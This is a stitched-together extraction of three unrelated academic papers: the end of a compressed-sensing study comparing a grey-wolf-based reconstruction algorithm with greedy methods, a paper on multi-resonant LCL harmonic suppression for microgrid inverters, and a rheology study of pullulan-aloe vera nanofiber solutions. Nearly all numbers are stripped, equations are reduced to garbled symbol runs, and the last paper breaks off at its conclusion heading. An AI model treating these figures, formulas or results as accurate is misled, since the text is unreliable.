illustration of the reconstruction performance of gwra, cosamp, omp, fbp, sp, ba and pso with different measurement vector length, m is given in fig. . from the figure, we observe that gwra algorithm still gives the lowest anmse results compared to the others. in the third test, reconstruction performance of gwra is measured in terms of anmse as a function of compression ratio over uniform and gaussian sparse vectors as figure anmse in gwra, cosamp, omp, fbp, sp, ba and pso algorithms over generated gaussian sparse vector. full-size doi: . /peerj-cs. /fig- table parameters setting. parameter value signal length (n) measurement vector length (m) cs matrix (f) � sparse level (k) from to with five increment search agents matrix xi � j i = , j = k compression ratio %, %, %, % and % aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shown in fig. and table , respectively. in this test, we have n = and the different compression ratios are %, %, %, % and % where k = m/ . figure shows the anmse for gwra, cosamp, omp, fbp, sp, ba and pso for different compression ratios. from fig. , we can conclude that gwra algorithm achieves the best reconstruction performance with different compression ratio. the same performance can be noted from table , where gwra achieves the minimum reconstruction error in comparison to the other algorithms for different compression ratio values. figure anmse in gwra, cosamp, omp, fbp, sp, ba and pso algorithms over generated gaussian matrix with different lengths of m. full-size doi: . /peerj-cs. /fig- figure anmse in gwra, cosamp, omp, fbp, sp, ba and pso algorithms over generated uniform sparse vector. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table anmse for different compression ratios over generated gaussian sparse vector. compression ratio (%) gwra cosamp omp fbp sp ba pso . e- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . figure anmse in gwra, cosamp, omp, fbp, sp, ba and pso algorithms for different compression ratios. full-size doi: . /peerj-cs. /fig- figure mape over sparsity for uniform sparse vector in gwra, cosamp, omp, fbp, sp, ba and pso. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mean absolute percentage error evaluation in the fourth test, we measure the reconstruction performance of gwra in terms of mape and the result is compared with other algorithms. figure shows mape results for gwra, cosamp, omp, fbp, sp, ba, pso algorithms and it is clear that gwra exceeds the reconstruction performance of others in terms of reducing the mape, because gwra integrates the advantages of both greedy as well as the gwo algorithm to achieve the best result. case study here, we demonstrate the effectiveness of the gwra algorithm introduced in this paper in reducing anmse and mape. for this purpose, the proposed algorithm is applied figure weather trace in dct domain: (a) the original data and (b) the sparse signal representation. full-size doi: . /peerj-cs. /fig- figure weather trace in fft domain: (a) the original data and (b) the sparse signal representation. 
full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to reconstruct real weather dataset (ali, gao & mileo, ). this dataset contains weather observations of aarhus city, denmark obtained during february–june and also august–september . in this test, we use the weather dataset of february period as original data. using cs, february dataset is compressed, then we apply, evaluate and compare the performance of gwra, cosamp, omp, fbp, lp (pant, lu & antoniou, ) and sp to recover it back. in addition, we use dct (duarte-carvajalino & sapiro, ) and fft (canli, gupta & khokhar, ) as sparse domain, as shown in figs. and . figure shows the anmse of gwra, cosamp, omp, fbp, lp and sp using dct domain. it is clear that gwra achieves the great performance in reducing anmse than other algorithms in case of using dct as a signal transformer. figure shows that using fft domain as signal transformer, the anmse of all algorithms increases, but still gwra provides the best performance. figure anmse in gwra, sp, fbp, lp, omp and cosamp algorithms using dct domain (case study). full-size doi: . /peerj-cs. /fig- figure anmse in gwra, sp, fbp, lp, omp and cosamp algorithms using fft domain (case study). full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as a last test in case study, the performance of gwra, sp, fbp, lp, omp and cosamp are evaluated in terms of mape. it shows that gwra still succeeds to be superior in the reconstruction performance than the others in terms of reducing mape as shown in fig. . complexity analysis figure shows the complexity in the gwra, omp, cosamp and sp algorithms. it is clear that as swarm algorithm, the complexity of the proposed algorithm is higher than the ga but it is more efficient in data reconstruction. however, the high complexity in gwra does not represent a problem, since the algorithms will be executed at the bs which has enough hardware capability and not energy constraint. figure mape in gwra, sp, fbp, lp, omp and cosamp algorithms for weather trace (case study). full-size doi: . /peerj-cs. /fig- sparsity level . . . . a v e ra g e r u n t im e ( s e c ) × - sp omp cosamp gwra figure complexity comparison gwra, omp, cosamp and sp algorithms. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ image reconstruction test in this test, we aim to evaluate the reconstruction performance of the gwra, where it is used to reconstruct � campanile image, which is a typical sight on the berkeley campus (https://github.com/dfridovi/compressed_sensing) (fridovich-keil & kuo, ), as shown in fig. . it can be noted that gwra efficiently succeeds to reconstruct the test image with small error which proves the efficiency of gwra. conclusion in this paper, a novel reconstruction approach for cs signal, based on gwo has been presented which integrates between ga and gwo algorithms to utilize their advantages in fast implementation and finding optimal solutions. 
in the provided experiments, gwra exhibited better reconstruction performance for gaussian and uniform sparse signals. gwra achieved overwhelming success over the traditional ga algorithms cosamp, omp, fbp and sp. also, gwra provided better reconstruction performance than other swarm algorithms ba and pso. gwra successfully reconstructed datasets of weather observations as a case study and it is shown that gwra succeeded to recover the data correctly with lesser anmse and mape than compared with existing algorithms. the demonstrated performance prove that gwra is a promising technique that provides significant reduction in reconstruction errors. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � ahmed aziz conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or figure gwra based image reconstruction test: (a) original image and (b) the reconstructed image. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dfridovi/compressed_sensing http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � karan singh conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � ahmed elsawy conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � walid osamy conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � ahmed m. khedr conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: matlab code is available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. rferences ali mi, gao f, mileo a. . citybench: a configurable benchmark to evaluate rsp engines using smart city datasets. in: the semantic web - iswc - th international semantic web conference, october – , , bethlehem, pa, usa. bao w, liu h, huang d, hua q, hua g. . a bat-inspired sparse recovery algorithm for compressed sensing. computational intelligence and neuroscience : doi . / / . burak n, erdogan h. . compressed sensing signal recovery via forward–backward pursuit. digital signal processing ( ): – doi . /j.dsp. . . . candes e, tao t. . robust uncertainty principles: exact signal reconstruction from highly incomplete frequency information. ieee transactions on information theory ( ): – doi . /tit. . . 
canli t, gupta a, khokhar a. . power efficient algorithms for computing fast fourier transform over wireless sensor networks. in: ieee international conference on computer systems and applications, . piscataway: ieee, – . cevher v, jafarpour s. . fast hard thresholding with nesters gradient method. in: workshop on practical applications of sparse modeling. available at https://infoscience.epfl.ch/record/ /files/nips _ .pdf. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / / http://dx.doi.org/ . /j.dsp. . . http://dx.doi.org/ . /tit. . https://infoscience.epfl.ch/record/ /files/nips _ .pdf https://infoscience.epfl.ch/record/ /files/nips _ .pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chartrand r, yin w. . iteratively reweighted algorithms for compressive sensing. in: ieee international conference on acoustics, speech and signal processing. piscataway: ieee, – . choi k, wang j, zhu l, suh ts, boyd s, xing l. . compressed sensing based cone-beam computed tomography reconstruction with a first-order method. medical physics ( ): – doi . / . . dai w, milenkovic o. . subspace pursuit for compressive sensing signal reconstruction. ieee transactions on information theory ( ): – doi . /tit. . . davenport ma, boufounos pt, wakin mb, baraniuk rg. . signal processing with compressive measurements. ieee journal of selected topics in signal processing ( ): – doi . /jstsp. . . donoho d. . compressed sensing. ieee transactions on information theory ( ): – . donoho dl, tsaig y, drori i, starck jl. . sparse solution of underdetermined systems of linear equations by stagewise orthogonal matching pursuit. ieee transactions on information theory ( ): – doi . /tit. . . du x, cheng l, chen d. . a simulated annealing algorithm for sparse recovery by l minimization. neurocomputing : – doi . /j.neucom. . . . du xp, cheng lz, liu lf. . a swarm intelligence algorithm for joint sparse recovery. ieee signal processing letters ( ): – doi . /lsp. . . duarte-carvajalino jm, sapiro g. . learning to sense sparse signals: simultaneous sensing matrix and sparsifying dictionary optimization. ieee transactions on image processing ( ): – doi . /tip. . . faris h, aljarah i, azmi al-betar m, mirjalili s. . grey wolf optimizer: a review of recent variants and applications. neural computing and applications ( ): – doi . /s - - - . fridovich-keil d, kuo g. . image compression using compressed sensing. available at https://github.com/dfridovi/compressed_sensing. mallat s, wavelet a. . tour of signal processing. new york: academic press. mallat sg, zhang z. . matching pursuits with time-frequency dictionaries. ieee transactions on signal processing ( ): – doi . / . . mirjalili s, mohammad mirjalili s, lewis a. . grey wolf optimizer. advances in engineering software : – . needell d, tropp ja. . cosamp: iterative signal recovery from incomplete and inaccurate samples. applied and computational harmonic analysis ( ): – doi . /j.acha. . . . needell d, vershynin r. . uniform uncertainty principle and signal recovery via regularized orthogonal matching pursuit. foundations of computational mathematics ( ): – doi . /s - - - . pant jk, lu w, antoniou a. . new improved algorithms for compressive sensing based on lp norm. ieee transactions on circuits and systems ii: express briefs ( ): – . tropp ja, gilbert ac. . 
signal recovery from random measurements via orthogonal matching pursuit. ieee transactions on information theory.

international journal of advanced network, monitoring and controls

research on multi-resonant lcl harmonic suppression strategy

jingwen chen, xin zhou and hongshe dang*
school of electrical and information engineering, shaanxi university of science and technology, shaanxi, china
*address correspondence to this author at xuefu road, xi'an, china; e-mail: @qq.com

abstract—aiming at the resonance problem that arises when an lcl-filtered microgrid inverter is connected to the grid, a multi-resonance lcl harmonic suppression strategy is proposed. after analyzing the principle and establishing the mathematical model in detail, the realization of the multi-resonance constant-power compound control strategy is studied. simulation verifies the validity of the control strategy: the scheme stabilizes the output power, reduces the total harmonic distortion of the grid-connected inverter to . %, and lowers the corresponding phase-current distortion rate to . %. the suppression effect is evident, so the scheme is an effective harmonic suppression method.

keywords—microgrid inverter; harmonic; multi-resonance control; constant power control

i. introduction

with the depletion of traditional energy sources, new energy generation systems built on the microgrid have developed rapidly because they are flexible, decentralized, small in scale, close to users, and based on clean energy. since the energy mix of the microgrid consists mainly of clean sources such as wind and photovoltaic power, the distributed sources generally feed electricity into the grid through power electronic converters to realize grid connection. the large number of power electronic devices connected to the grid injects harmonics, which lowers the converter power factor, can excite parallel or series resonance, degrades the accuracy of active and reactive power measurement, and reduces power quality, bringing considerable harm to users and to the safe and economical operation of the power system. harmonic suppression is therefore very important. current research on harmonic suppression mainly includes: harmonic suppression based on active power filters [ ] [ ] [ ]; microgrid harmonic suppression based on virtual impedance [ ]; and harmonic suppression for lcl-type grid-connected inverters [ ] [ ] [ ] [ ].
compared to l-filter, lcl-type filter has a third-order low-pass filter characteristics,( lcl filter with third order low pass filter properties), so for the same harmonic standard and lower switching frequency, we can use a relatively small filter inductor design, effectively reduce the system size(volume) and reduce losses, but the same will bring resonance problems. in this paper, a harmonic control strategy of micro-grid inverter based on pi control, multi-resonance control and lcl constant power control is proposed, which is used in the process of grid-connected control of micro-grid inverter to further reduce and net voltage of the total harmonic distortion rate, get better power of the grid. ii. material and methods a. principle block diagram of multi resonance lcl harmonic suppression strategy figure is lcl multi-resonant constant power grid control system block diagram. where ref p ref q are the international journal of advanced network, monitoring and controls volume , no. , actual active and reactive power reference values, abc v 、 abc i are the actual values of the grid voltage and current, d v 、 q v and d i 、 q i are the voltage components of the dq axis, dref i and qref i are the capacitor current reference value, cd i 、 cq i 、 cdref i 、 cqref i are the capacitance current detection value on the dq axis components and capacitance current reference value. the figure includes pq control module, current loop multi-resonance control module, and pwm modulation module etc. micro-network inverter grid output voltage abc v and current detection values oabc i ,after coordinate transformation to get 、 and 、 ,will be sent to the pq controller; pq controller according the active and reactive setpoint ref p and ref q to calculate the current reference values and and then compare with the current detection value of the components and . and after the ratio multi-resonant regulator in the current loop control module, the reference values , of the capacitive current are obtained, then compared with the capacitance current detection value αβ component and . and then adjusted by the proportional regulator g_ (s), the control pwm circuit drives the inverter, so that the inverter output active power and reactive power constant. in order to meet the requirements of system stability, the current loop control module in figure solves the resonance problem caused by lcl, and achieves the purpose of suppressing low frequency harmonics and improves the system accuracy. figure . principle block diagram of multi resonance lcl harmonic suppression strategy b. multi - resonant lcl grid - connected control mathematical model figure constitutes a third-order lcl-type filter, where l is the inductance, r is its internal resistance and the equivalent resistance between the upper and lower legs of each phase, r is the internal resistance of l . in the case of three-phase grid voltage symmetry, the mathematical model is as follows:                dc k no s di t di t l r i t l r i t dt dt u t s t u u t               c du t c i t i t dt             , , dc dc dc k k k a b c du t i t c i t s t dt             , , dc no k k a b c u t u t s t      international journal of advanced network, monitoring and controls volume , no. 
, where k s is the switching function of the power switching device, when k s  , the upper arm is turned on and the lower arm is turned off; when k s  , the upper arm off, the lower arm conduction. corresponding to the relationship between α and β stationary coordinate system is as follows:  ca c c c c c di l u u r i dt di l u u r i dt di l u e r i dt di l u e r i dt i i i i i i                                       i  、 i  、 i  、 i  are the α and β components of the input and output currents in the αβ coordinate system; c i  、 c i  、 c u  、 c u  are the α and β components of the capacitive current and voltage in the αβ coordinate system; e  and e  are the α and β components of the grid voltage in the αβ coordinate system. c. a block diagram of current loop control lcl-type filter in the better suppression of high-frequency harmonics at the same time, because of its own structure for a third-order system, easy to produce resonance, the frequency near the narrow band and too high gain, will lead to the system and the load parameter changes are very sensitive, affecting the stability of the system to bring a series of impact and harm to the grid. in order to reduce its sensitivity and high gain characteristics, to achieve the ac signal without static tracking, this paper on the basis of the use of active damping introduced into the capacitor current loop regulation to suppress high frequency interference, and the external loop current using proportional resonance control , constructs a transfer function that performs ac compensation on the reference input signal. so that in a specific bandwidth in the same frequency response characteristics, to meet the system stability requirements, so that the output at the resonant frequency at high gain, the other frequency segment attenuation. thus reducing the resonance, improve the stability of the system and control accuracy. the control block diagram is showas follows: figure . block diagram of current loop control as shown in figure where selected proportional resonance regulator, selected proportional regulator. after the current is transformed by the coordinate, the voltage and current 、 and 、 in the two stationary coordinates are obtained and sent to the pq calculation module to obtain the reference current 、 ,and then compared with and obtained the deviation by the proportionmulti-resonant regulator in the current loop control module , get the capacitor current reference value and , and it is compared with the capacitance current detection value αβ component and , after adjusting the proportional regulator , then control pwm circuit drives the inverter, so that the inverter output active power and reactive power constant. d. pr control since the pr regulator is equivalent to the pi modulator in the stationary coordinate system under the αβ coordinate, international journal of advanced network, monitoring and controls volume , no. , the pr regulator can also be used to design the pi regulator parameter. figure in the parallel current and reference current deviation, through the multi-resonant control get the capacitor current reference value cref i , cref i and the actual capacitance of the current deviation, and then through the proportional control, the resulting signal through the pwm modulation to achieve active damping control. 
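To make the proportional multi-resonant regulator concrete before the transfer functions are given, the sketch below evaluates the frequency response of a quasi-PR regulator of the common form kp + Σh 2·kr·ωc·s / (s² + 2·ωc·s + (h·ω0)²). The gains, the cut-off ωc, the 50 Hz fundamental and the compensated harmonic orders (5th, 7th, 11th here) are illustrative assumptions, since the paper's numerical values are not recoverable from the extracted text.

```python
# Hedged sketch of a multi-resonant quasi-PR regulator's frequency response,
# assuming NumPy; all parameter values below are illustrative assumptions.
import numpy as np

def quasi_pr(s, kp, kr, wc, w0, harmonics=(1, 5, 7, 11)):
    """G(s) = kp + sum_h 2*kr*wc*s / (s^2 + 2*wc*s + (h*w0)^2)."""
    g = np.full_like(s, kp, dtype=complex)
    for h in harmonics:
        g += 2 * kr * wc * s / (s**2 + 2 * wc * s + (h * w0) ** 2)
    return g

w0 = 2 * np.pi * 50                        # 50 Hz fundamental (assumed grid frequency)
f = np.linspace(1, 1000, 5000)             # frequency sweep in Hz
s = 1j * 2 * np.pi * f
gain_db = 20 * np.log10(np.abs(quasi_pr(s, kp=1.0, kr=100.0, wc=2 * np.pi, w0=w0)))

# The response shows narrow high-gain peaks at the fundamental and at each
# compensated harmonic, which is what lets the regulator track those AC
# components with negligible steady-state error while attenuating others.
print(f"gain near 250 Hz: {gain_db[np.argmin(np.abs(f - 250))]:.1f} dB")
```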
the use of a proportional feedback control of the capacitor current, stabilize the capacitor voltage, and enhance the stability of the system. the parallel current and capacitive current transfer functions are as follows:        ref pwm pwm i pwm pwm pwm i i s g s i s kk k s kk k l l cs kk l cs ls kk s kk k          the corresponding characteristic equation is:    pwm pwm pwm i d s l l cs kk l cs ls kk s kk k       according to the rouse stability criterion, the system stability condition is calculated as:    pwm i k l l k l k l kk k l c          according to the stability criterion (formula ) to set the parameters, so that when the grid to reach a stable state. iii. multiple pr control a single pr regulator generates an infinite gain at a specific frequency. in order to ensure its stability and easy to achieve, using the approximate structure; its transfer function is as follows:the transfer function is as follows: hwcs s wcs wh ( ) where is the scale factor, is the frequency adjustment coefficient, is the resonance coefficient, and is the resonant frequency. in order to achieve the , , harmonic current compensation need to re-connect three resonant controller. the transfer function of the current inner loop multi-resonance controller is:  the minimum value of the resonant frequency in the lcl grid-connected inverter is: ( ) then the minimum value of k is:  in order to ensure the stability of the control system, the cutoff frequency should be chosen to be less than so the in the multi-resonance pr control can be approximated by the cutoff frequency :  according to the scope of k and the specific control requirements, through the control system open-loop baud diagram for parameter adjustment. iv. discussion based on the detailed analysis of the principle of multi-resonance constant power control, the simulation results of the mathematical model are as follows international journal of advanced network, monitoring and controls volume , no. , figure . dc side voltage control after active, no power waveform as shown above, the active and reactive power of the output after lcl multi-resonant constant power control is constant, which ensures the stable operation of the system. figure . by lcl multi-resonant constant power control before and after the voltage waveform from fig. , we can find that the voltage and current waveforms before the lcl multi-resonant constant power control are unstable and distorted. after the control of the voltage and current waveform is improved, harmonic suppression effect is obvious. figure . by lcl multi-resonant constant power control before and after the current waveform from the above figure can be found by the lcl multi-resonant constant power control after the current waveform has improved. in order to analyze the filtering effect by lcl multiresolution constant power control, the voltage distortion rate, the total voltage distortion rate and the current distortion rate of the respective voltage waveforms before and after the control are summarized as shown in table and respectively. table i. lcl multi-resonant constant power grid-connected control before and after the voltage harmonic content voltage distortion rate current distortion rate before filtering . % . % after filtering . 
% . % table ii. lcl multi-resonant constant power control before and after the voltage and current distortion number of harmonics before filtering . % . % . % after filtering . % . % . % from table , it can be found that the contents of the harmonics before the filtering are reduced and have an inhibitory effect. international journal of advanced network, monitoring and controls volume , no. , table can be seen by lcl multi-resonant constant power control filter before the voltage distortion rate of . %, a phase current distortion rate of . %, filtered voltage distortion rate reduced to . %, the corresponding phase current distortion small to . inhibitory effect is obvious. v. conclusion in this paper, a harmonic suppression strategy for micro-grid inverter combined with lcl constant power control and multi-resonant pi control is proposed for the resonant problem of lcl filter microgrid inverters. it is found that the scheme stabilizes the output power lcl and reduces the total harmonic distortion rate of the grid inverter to . % and the corresponding phase current distortion rate is reduced to . %. the harmonic suppression effect is obvious. references [ ] shang taohong. study and parameter design of shunt hybrid active power filter [j] proceedings of the computer science, , ( ): - . [ ] li yan, luo an, fang lu, wang wen. high voltage type hybrid active power filter [j]. journal of electric technology, , ( ): - [ ] wang jidong, qin meicui. micro grid harmonic suppression method [j]. journal of tianjin university apf based on the (science and technology edition), , ( ): - [ ] li li. study on hierarchical control and power quality improvement of microgrid [d]. beijing: north china electric power university, [ ] han yongru, xue shilong, and study on the control strategy of grid connected inverter based on lcl filter [j]. shanghai: maritime university, , ( - ): (in chinese) [ ] huang yafeng, li long, yan gangui large capacity pv inverter lcl filter parameter optimization design [j]. beijing: north china electric power university, , ( ): - [ ] zhang xing, li fei, and in the grid connected inverter lcl filter improved topology [j]. hefei: hefei university of technology, , : - [ ] xu jinming, xie shaojun, l l filter grid connected inverter robust current control [j]. nanjing: nanjing university of aeronautics and astronautics, , ( ): - [ ] yang kun, xie chuan, chen guozhu. current control of static reactive power generator based on frequency adaptive resonance controller [j]. journal of electrical engineering, , ( ): - . [ ] zhang zhicheng, liu zhenlai, guan huchang. island micro grid harmonic control method of [j]. power electronic technology, , ( ): - chen jingwen ( -), male (han nationality), inner mongolia chifeng people, associate professor, graduate tutor, research direction for micro-grid technology and application, e-mail: chenjw@sust.edu.cn zhou xin ( -), female (han), xianyang, shaanxi, master, research direction for micro-grid harmonics, inter-harmonics of the study dang hongshe( -), male (han nationality), shaanxixianyang people, professor, research direction for micro-gridtechnology and application, (corresponding author: e-mail: @qq.com) mailto: @qq.com conference full paper template international journal of advanced network, monitoring and controls volume , no. , doi: . 
/ijanmc- - rheological properties of pullulan and aloe vera nanofiber solutions haifa el-sadi wentworth institute of technology boston, usa e-mail: elsadih@wit.edu sally shady stevens institute of technology, hoboken, nj e-mail: sshady@stevens.edu alex bossart stevens institute of technology, hoboken, nj dilhan kalyon stevens institute of technology, hoboken, nj abstract—nanofibers have been used with increasing success for drug delivery and various biomedical engineering applications. the mixture of % pullulan- aloe vera can be pumped with a minor effects on the flow behavior. the fiber is then characterized by sem, shear viscosity, storage and loss moduli. the oscillatory shear data is employed. the mixture has a complex rheological properties that includes extreme shear- thinning as well as viscoelastic properties and yield stress. the rheology of the pullulan- aloe vera nanofber was characterized, the measurement method may influence the results, it is unclear how the behavior near walls influence the measurement method, parallel-plate rheometer is used to measure rheological properties. the data and rheological parameters should facilitate a better understanding of the process-ability characteristics of the mixture. the cross model provides a simple way of quantifying the viscosity/shear rate profile for a shear thinning mixture. sem images are carried out. keywords-nanofiber; rheology; pulluan; aloevera; yield stress i. introduction aloe vera is a therapeutic medicinal plant that has been used for many centuries to treat a wide range of ailments. there are over species of the aloe vera plant that have been studied. the most popular commercially grown are aloe barbadensis miller and aloe arborescens [ ]. many of the health benefits are associated with the structure and internal composition of the plant. studies have shown that the active ingredients in the aloe vera plant have demonstrated wound healing, antifungal, anti-inflammatory, anticancer, immunomodulatory and gastroprotective properties [ - ]. despite the exceptional healing properties of the aloe vera plant, there are several limitations with keeping these active ingredients stable. the bioactivity of the plant decreases approximately hours after harvesting [ , ]. exposure to light, humidity and temperature can also diminish these significant properties. current techniques used to overcome these challenges have been focused on the usage of antioxidants and stabilizing agents. such methods introduce other chemicals that would limit the scalability and purity of using non-toxic ingredients. pullulan is a linear polysaccharide produced by the polymorphic fungus aureobasidium pullulans. pullulan has a wide range of commercial and industrial applications in many fields such as food science, health care, pharmacy and even in lithography [ - ]. pullulan is a water-soluble, low moisture permeable polysaccharide with excellent mechanical properties[ ]. due to these properties, pullulan is often used as a drug tablet coating. as a result, pullulan has been used in many drug delivery applications including nanotechnology [ , - ]. nanofibers have been used with increasing success for drug delivery due to their extremely high surface to volume ratio, low density, and high porosity [reference]. in order to prevent aloe vera from international journal of advanced network, monitoring and controls volume , no. , degrading, it can be electrospun into nanofibers to encapsulate, preserve and administer the unique properties of aloe vera. 
pullulan is a biodegradable polymer with adhesive properties that has been used successfully in electrospinning [ ]. in this study, we investigate the rheological properties of pullulan-aloe vera nanofiber solutions, which provide insight into the material's behavior in a scaled-up manufacturing process.

ii. materials and method

a. nanofiber preparation
a mixture of the polymer pullulan pf- food grade (nagase, japan), molecular weight , g/mol, and fresh aloe vera was used to create the nanofibers. to prepare the nanofibers, aloe vera leaves were first washed and their outer green rinds removed to obtain the gel fillet. the gel was then broken down using a conventional blender (ninja bl t) at an agitator speed of rpm. the procedure was completed within s to avoid enzymatic decomposition [ ]. a homogeneous gel mixture was then formed using % pullulan. the solution was then electrospun using a harvard apparatus phd syringe pump at and kv, with a distance of cm and a flow rate of . µl/min.

b. scanning electron microscopy (sem)
imaging was performed with a zeiss auriga focused ion fe sem (oberkochen, germany). all materials were coated with gold nanoparticles for one minute using a leica em med (wetzlar, germany) under vacuum. analysis was carried out at . kv eht, and the dimensions of the fibers were estimated using imagej and diameterj.

c. rheological properties
the prepared mixture was loaded between two mm-diameter parallel plates with a gap of . mm in a rheometer (ares). a high frequency and strain were chosen to make sure that enough torque was generated for the transducer. a time sweep test at a frequency of rps and a strain of % was performed to analyze the effect of evaporation of the mixture on the results. prior to the dynamic property measurements, a strain sweep test at a constant frequency of rps determined the linear viscoelastic region. a frequency sweep test over - rps at a strain of % (within the linear viscoelastic region) was performed at room temperature to obtain the dynamic properties (g', g'') of the mixtures. g', the storage modulus, describes the elastic properties, and g'', the loss modulus, describes the viscous properties; both were calculated by the rheometer software by deconvolution of the torque (shear stress) versus time data.

iii. discussion
the homogeneous solution of % pullulan in aloe vera was prepared to study the rheological properties of these nanofiber solutions, as shown in figure . these properties demonstrate the capabilities of the material solution in manufacturing processes such as 3d printing and extrusion. to our knowledge, this is the first study to prepare pullulan-aloe vera nanofibers from a fresh aloe vera plant. given the medicinal properties of aloe vera, pullulan is used as a carrier to help stabilize the bioactivity. sem images confirmed that pullulan-aloe vera nanofibers can be developed successfully, as shown in figures and . the kv group produced fibers of + nm while the kv group produced + nm [ ]; fibers prepared at the kv setting were more consistent. the storage (elastic) and loss (viscous) moduli of the pullulan-aloe vera mixture at oc for s increase with frequency, as shown in figure . the storage and loss moduli are almost constant at low frequency and increase significantly at higher frequencies, which is related to the increase in interaction between the mixture components. it is observed that the viscous modulus is significantly larger than the storage modulus.
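as an illustration of the shear-thinning analysis reported further down in this discussion, the sketch below fits the cross model η(γ̇) = η∞ + (η0 − η∞)/(1 + (cγ̇)^m) to a viscosity versus shear-rate curve with an ordinary least-squares routine. the data points and starting guesses are synthetic placeholders, not the measured pullulan-aloe vera values; python with numpy and scipy is assumed.

```python
# sketch of fitting the cross shear-thinning model to viscosity/shear-rate data.
# the "measurements" are synthetic stand-ins used only to show the procedure.
import numpy as np
from scipy.optimize import curve_fit

def cross_model(gdot, eta0, eta_inf, c, m):
    return eta_inf + (eta0 - eta_inf) / (1.0 + (c * gdot) ** m)

gdot = np.logspace(-2, 3, 30)                       # shear rate (1/s)
eta_meas = cross_model(gdot, 50.0, 0.05, 2.0, 0.8)  # placeholder "true" curve (Pa*s)
eta_meas *= 1 + 0.03 * np.random.default_rng(0).standard_normal(gdot.size)

popt, _ = curve_fit(cross_model, gdot, eta_meas,
                    p0=[eta_meas.max(), eta_meas.min(), 1.0, 1.0], maxfev=10000)
eta0, eta_inf, c, m = popt
print(f"eta0 = {eta0:.2f} Pa*s, eta_inf = {eta_inf:.3f} Pa*s, c = {c:.2f} s, m = {m:.2f}")
```

the fitted exponent m characterises how strongly the viscosity depends on shear rate in the shear-thinning region, and 1/c marks roughly where shear thinning sets in, which is how these constants are interpreted in the discussion below.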
figure shows the viscoelastic behavior of the mixture of pullulan and aloe vera: the complex modulus increases with increasing frequency, and the viscous modulus remains higher than the elastic modulus.

figure . the overall process to develop the nanofiber demonstrating the multiple applications.
figure . nanofiber using phd syringe pump at kv (a) , times magnification, (b) , times magnification
figure . nanofiber using phd syringe pump at kv (a) , times magnification, (b) , times magnification
figure . elastic and viscous modulus of a mixture as a function of frequency at oc.
figure . complex modulus as a function of frequency at oc

figure describes the change in viscosity of the mixture of pullulan and aloe vera with respect to stress: the viscosity decreases as the stress increases. such a viscosity decrease is directly related to the decrease of the zeta potential. the yield stress is a key parameter in production, as it determines the force required to fill a product into its container or to make it flow. the stress at the viscosity maximum is taken as a measure of the yield stress. the yield stress is . pa, which shows that only a small force is required to make the mixture flow.

figure . (a) viscosity vs. stress, (b) viscosity vs. shear rate

the cross shear-thinning model gives good agreement with the measured data:

η = η∞ + (η0 − η∞) / (1 + (c·γ̇)^m)

η = η0 / (1 + (c·γ̇)^m)

where γ̇ is the shear rate and η0 is the zero-shear viscosity; the infinite-shear-rate viscosity η∞ is taken as zero, which reduces the first expression to the second. m is the cross rate constant; it is dimensionless and measures the degree of dependence of viscosity on shear rate in the shear-thinning region. a value of zero for m indicates newtonian behavior, while larger values of m indicate increasingly shear-thinning behavior. c is the cross time constant and has units of time. m and 1/c are related to the texture of the mixture and to its pumping, mixing, and pouring characteristics. figure indicates that at c = , the cross model fits the experimental data at shear rates above . /s; the deviation at lower rates might be due to experimental error. above c = , the cross model is not applicable for this type of mixture.

figure . validation of cross model with experimental data.

the rheometer was also used for stress relaxation experiments. the mixture of pullulan and aloe vera is stable at oc, as shown in figure ; the viscous modulus remains higher than the elastic modulus of the mixture.

figure . storage and loss modulus vs. time

iv. conclusion
